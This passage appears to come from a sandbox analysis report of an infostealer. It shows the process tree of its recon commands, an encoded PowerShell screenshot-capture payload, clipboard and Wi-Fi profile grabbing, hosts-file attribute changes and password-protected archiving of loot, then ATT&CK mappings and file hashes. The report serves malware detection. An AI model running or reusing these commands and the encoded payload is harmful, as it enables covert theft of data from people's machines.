        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:3724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:812
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4672
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:3824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3312
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:816
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:220
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:4560
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:2936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:2360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:3092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1468
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4576
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2956
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:3812
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:1020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:2368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:64
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2et0w5eu\2et0w5eu.cmdline"
        6⤵
        
        PID:2020
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D9.tmp" "c:\Users\Admin\AppData\Local\Temp\2et0w5eu\CSCBD4739F859D6403E88D88727322F3D7F.TMP"
        7⤵
        
        PID:860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:3416
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:812
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:2024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4632
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2836
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:2832
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:628
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:4652
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1472
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2024
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2388
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4240
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2936
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18362\rar.exe a -r -hp"1273" "C:\Users\Admin\AppData\Local\Temp\X96x5.zip" *"
      4⤵
      PID:4976
    - - C:\Users\Admin\AppData\Local\Temp\_MEI18362\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI18362\rar.exe a -r -hp"1273" "C:\Users\Admin\AppData\Local\Temp\X96x5.zip" *
        5⤵
        Executes dropped EXE
        
        PID:4116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:3368
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2024
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:1996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:1640
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:1616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:1732
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3416
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:4348
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:976
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4280
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:1856
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5020
- C:\Users\Admin\AppData\Local\Temp\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
5.8MB

MD5
951604a87ebb08dfc865c263d65ec590

SHA1
bbacc1f2038dddd74a691dd07c3cb48090823f4b

SHA256
5fc9274dfc3efba1ffeabb3b7a5ab73e1c6de9b5fc9272a3e05adf82890a6510

SHA512
0b3747519b72a0dc8989c05509a50987621c5ca8c957c3cd70c0eb381320fb2c507e4811559f6ce44cff79faa4bd79712afce63354af81cf8f72445c1bfa9791

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client-built.exe

Filesize
78KB

MD5
1cb84afe238e7074a68adf518638e138

SHA1
ad27759ddd719b6c1d26fc227a50607041ec04e4

SHA256
018cb02d86da049a38228bb0515ae0a7f5224980669959f2cfec563b8f4f3445

SHA512
47785cf65f53572e1dd544cc9361b4396337b5dc22ea45fa0c1ea7c3b0a77597e7946299c800cdbcd59bf64f08f72a73096ff776af508607e962eb01cecb3d48

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\VCRUNTIME140.dll

Filesize
94KB

MD5
a87575e7cf8967e481241f13940ee4f7

SHA1
879098b8a353a39e16c79e6479195d43ce98629e

SHA256
ded5adaa94341e6c62aea03845762591666381dca30eb7c17261dd154121b83e

SHA512
e112f267ae4c9a592d0dd2a19b50187eb13e25f23ded74c2e6ccde458bcdaee99f4e3e0a00baf0e3362167ae7b7fe4f96ecbcd265cc584c1c3a4d1ac316e92f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_bz2.pyd

Filesize
43KB

MD5
7170cba1a9d349a9899676a885b454af

SHA1
71f03d8c833329f840b2083ee082114442758fc7

SHA256
2b329971c66ca1d817e01520e687170f9e8a8a2b834eebf65674d14c0bb8d6b9

SHA512
078db324a9a5c61147ae3105a9741e00d198d68df40ad938810468e70a1bbaac8375885a46be3964c25e1540d67e6ca6273e676252d9d1e2067fef49a7651ed9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_ctypes.pyd

Filesize
53KB

MD5
40f06d117408266b5cbd399926ac6db5

SHA1
083d43a7333d724483e745c8e666958022e648c5

SHA256
842c17ff15c55deb82f18d91bac496f9728f0b9b42ba3e59e6d147dd9775191e

SHA512
54dbf9e464f1ca912bda169fc02fe9b9e970a5b75bd5ffbd5d176307836a7d66ad51e46bb219f7c52de17cffc5d5d3d88f285ac49bffdfecec0dc5eade71b586

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_decimal.pyd

Filesize
100KB

MD5
2957e6881415ce29fe537fc0a9398802

SHA1
6cdbaa6ac46a01eb465d46f3aae3a849fcb467e7

SHA256
bc3ed7dcdc7d924eff2c973bc42b4554df77e2a8b447c9bae2255ca12c9eb7f1

SHA512
acd765262ddd149efd0b266a9773466f22a337dcf8b68f47528b881a488badee3e286ad4015f7c5a81c955b3862aa2e241a33c434fbbb67e87d94af7ef73dba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_hashlib.pyd

Filesize
30KB

MD5
eb60987a9fbaab6cd09f375007d3f818

SHA1
152dda528f4590e20806642d45d54ebd2b684dfb

SHA256
4e522e24c6022f9190d5cd2e6ffe430b7dfa910daf5c9573443139ed5108aaac

SHA512
172d1b1c8c152a0d68b23f8cd60dd2dd7b7d56c748efec5cc20cd79c9b0e669ffb0a49812f755fbb1928fe64a67c4a0a41bbab0abb5835595cce30416051953b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_lzma.pyd

Filesize
81KB

MD5
74231122ddc358d47144ab20826e387b

SHA1
a8efa5cd2ce1b69ac13e7a2ad53f6b5519671a4d

SHA256
dcd07e7f4552fa322d1b7654a05e26b438b289ce2b9328a1ed4154e0b9051da4

SHA512
aae771b00849ac9d2eb3fa9aaad167d60a95236454b2a5c9b0c986359d918a44b25556f63d8e4879364bbfbbc06d460dadc2fd3a68a6e1920e14e2c81d53c354

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_queue.pyd

Filesize
21KB

MD5
a476730f12ba5f8243aaf7f63f8cc830

SHA1
759f23bab96ee6d65c326661cc9d4d9934c237bd

SHA256
9bb9890630ba0db29c2186622e9351a1389019683131cc25db32289cd57c4a2d

SHA512
cd97526961208e4c8646aa003b0594968c12586f2996af030c5d475f7eae790e045e5e259a2c0b3d6cac29bb362f9e5f2fcd0b527cd47088b6d961d6cb0e9c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18362\_socket.pyd

Filesize
38KB

MD5
7cc1dcc1c76edbb6509e13990d9f768b

SHA1
434901d28200cfead802132809827c49f1a56986

SHA256
